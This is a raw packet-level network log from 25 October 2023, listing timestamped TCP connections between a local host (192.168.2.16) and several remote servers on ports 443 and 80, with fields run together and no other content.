                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:43.957295895 CEST49817443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:43.957362890 CEST44349817104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:43.957426071 CEST49817443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:43.980195999 CEST44349818104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:43.980443001 CEST49818443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:43.980462074 CEST44349818104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:43.981568098 CEST44349818104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:43.981837034 CEST49818443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:43.981961012 CEST49818443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:43.981970072 CEST44349818104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:43.982013941 CEST44349818104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.002448082 CEST44349817104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.030648947 CEST49818443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.197680950 CEST44349817104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.197814941 CEST44349817104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.197890043 CEST49817443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.198915958 CEST49817443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.198946953 CEST44349817104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.214184046 CEST44349818104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.214325905 CEST44349818104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.214375019 CEST44349818104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.214381933 CEST49818443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.214421034 CEST49818443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.214909077 CEST49818443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.214931011 CEST44349818104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.377074957 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.377104044 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.377193928 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.377599001 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.377614021 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.573460102 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.573841095 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.573904991 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.574301958 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.574615002 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.574704885 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.574980974 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.575103045 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.575159073 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.575237989 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.575268030 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.593142986 CEST8049709209.197.3.8192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.593370914 CEST4970980192.168.2.16209.197.3.8
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.797821999 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.797883034 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.797916889 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.797949076 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.797983885 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798012972 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798042059 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798052073 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798052073 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798052073 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798082113 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798130989 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798135996 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798146009 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798182011 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798199892 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798258066 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798295021 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798304081 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.798990011 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.799038887 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.799588919 CEST49819443192.168.2.16104.17.3.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.799601078 CEST44349819104.17.3.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.811638117 CEST49820443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.811688900 CEST44349820104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.811764956 CEST49820443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.812249899 CEST49820443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:44.812264919 CEST44349820104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.011780024 CEST44349820104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.012124062 CEST49820443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.012149096 CEST44349820104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.013254881 CEST44349820104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.013593912 CEST49820443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.013720989 CEST49820443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.013767004 CEST44349820104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.068655968 CEST49820443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.241663933 CEST8049704209.197.3.8192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.241686106 CEST8049710209.197.3.8192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.241822958 CEST4970480192.168.2.16209.197.3.8
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.241906881 CEST4971080192.168.2.16209.197.3.8
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.247488976 CEST44349820104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.247654915 CEST44349820104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.247720003 CEST49820443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.248738050 CEST49820443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:45.248760939 CEST44349820104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:48.818942070 CEST4970980192.168.2.16209.197.3.8
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:48.912054062 CEST8049709209.197.3.8192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:48.912117958 CEST4970980192.168.2.16209.197.3.8
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:49.062705994 CEST49708443192.168.2.16204.79.197.200
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:49.062869072 CEST4971080192.168.2.16209.197.3.8
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:55.422636032 CEST49824443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:55.422671080 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:55.422741890 CEST49824443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:55.423538923 CEST49824443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:55.423552036 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:55.828743935 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:55.828872919 CEST49824443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:55.831953049 CEST49824443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:55.831975937 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:55.832314014 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:55.845513105 CEST49824443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:55.886451006 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.216382027 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.216412067 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.216429949 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.216572046 CEST49824443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.216589928 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.216650963 CEST49824443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.216716051 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.216757059 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.216768980 CEST49824443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.216785908 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.216830969 CEST49824443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.216923952 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.216981888 CEST49824443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.227417946 CEST49824443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.227431059 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.227472067 CEST49824443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:56.227477074 CEST4434982413.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:20.796238899 CEST49828443192.168.2.16172.253.122.105
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:20.796282053 CEST44349828172.253.122.105192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:20.796386003 CEST49828443192.168.2.16172.253.122.105
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:20.796852112 CEST49828443192.168.2.16172.253.122.105
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:20.796873093 CEST44349828172.253.122.105192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:21.020889997 CEST44349828172.253.122.105192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:21.021608114 CEST49828443192.168.2.16172.253.122.105
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:21.021632910 CEST44349828172.253.122.105192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:21.022002935 CEST44349828172.253.122.105192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:21.022455931 CEST49828443192.168.2.16172.253.122.105
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:21.022521019 CEST44349828172.253.122.105192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:21.066710949 CEST49828443192.168.2.16172.253.122.105
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.188513994 CEST49830443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.188544989 CEST44349830162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.188622952 CEST49830443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.189099073 CEST49830443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.189110994 CEST44349830162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.382457972 CEST44349830162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.382915974 CEST49830443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.382931948 CEST44349830162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.383322001 CEST44349830162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.383835077 CEST49830443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.383919954 CEST44349830162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.384025097 CEST49830443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.426453114 CEST44349830162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.591156006 CEST44349830162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.591291904 CEST44349830162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.591393948 CEST49830443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.592087030 CEST49830443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.592108965 CEST44349830162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:31.018718958 CEST44349828172.253.122.105192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:31.018800020 CEST44349828172.253.122.105192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:31.018975973 CEST49828443192.168.2.16172.253.122.105
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:32.849492073 CEST49828443192.168.2.16172.253.122.105
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:32.849523067 CEST44349828172.253.122.105192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.102384090 CEST49832443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.102427959 CEST44349832162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.102592945 CEST49832443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.103564024 CEST49832443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.103584051 CEST44349832162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.296719074 CEST44349832162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.297219038 CEST49832443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.297231913 CEST44349832162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.297609091 CEST44349832162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.298270941 CEST49832443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.298335075 CEST44349832162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.298439980 CEST49832443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.342447042 CEST44349832162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.508810997 CEST44349832162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.508929968 CEST44349832162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.509044886 CEST49832443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.509788990 CEST49832443192.168.2.16162.247.243.30
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:35.509803057 CEST44349832162.247.243.30192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:37.085273981 CEST4970480192.168.2.16209.197.3.8
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:37.178491116 CEST8049704209.197.3.8192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:37.178575039 CEST4970480192.168.2.16209.197.3.8
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.925487995 CEST49833443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.925523996 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.925762892 CEST49833443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.926048994 CEST49833443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.926059008 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.119910955 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.120263100 CEST49833443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.120273113 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.120635033 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.120974064 CEST49833443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.121042967 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.121120930 CEST49833443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.121206999 CEST49833443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.121238947 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.121306896 CEST49833443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.121315002 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.345669985 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.345719099 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.345740080 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.345824957 CEST49833443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.345838070 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.345853090 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.345875978 CEST49833443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.345911026 CEST49833443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.348570108 CEST49833443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.348583937 CEST44349833104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.373387098 CEST49834443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.373413086 CEST44349834104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.373501062 CEST49834443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.374216080 CEST49834443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.374226093 CEST44349834104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.377151966 CEST49835443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.377187014 CEST44349835104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.377398014 CEST49835443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.378164053 CEST49835443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.378176928 CEST44349835104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.570343018 CEST44349835104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.570894003 CEST49835443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.570905924 CEST44349835104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.571295977 CEST44349835104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.572102070 CEST49835443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.572165966 CEST44349835104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.572371006 CEST49835443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.573668003 CEST44349834104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.573961973 CEST49834443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.573976040 CEST44349834104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.574309111 CEST44349834104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.574748993 CEST49834443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.574805021 CEST44349834104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.574917078 CEST49834443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.574939966 CEST49834443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.574945927 CEST44349834104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.614449978 CEST44349835104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.811645031 CEST44349835104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.811769009 CEST44349835104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.811873913 CEST49835443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.812952042 CEST49835443192.168.2.16104.17.2.184
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:41.812975883 CEST44349835104.17.2.184192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.613029957 CEST49721443192.168.2.1623.41.168.93
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.719016075 CEST4434972123.41.168.93192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.719046116 CEST4434972123.41.168.93192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.719204903 CEST49721443192.168.2.1623.41.168.93
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.722536087 CEST49721443192.168.2.1623.41.168.93
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.839730978 CEST49836443192.168.2.16172.253.122.102
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.839767933 CEST44349836172.253.122.102192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.839962006 CEST49836443192.168.2.16172.253.122.102
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.840212107 CEST49836443192.168.2.16172.253.122.102
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.840225935 CEST44349836172.253.122.102192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:46.055641890 CEST44349836172.253.122.102192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:46.055955887 CEST49836443192.168.2.16172.253.122.102
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:46.055991888 CEST44349836172.253.122.102192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:46.056813955 CEST44349836172.253.122.102192.168.2.16
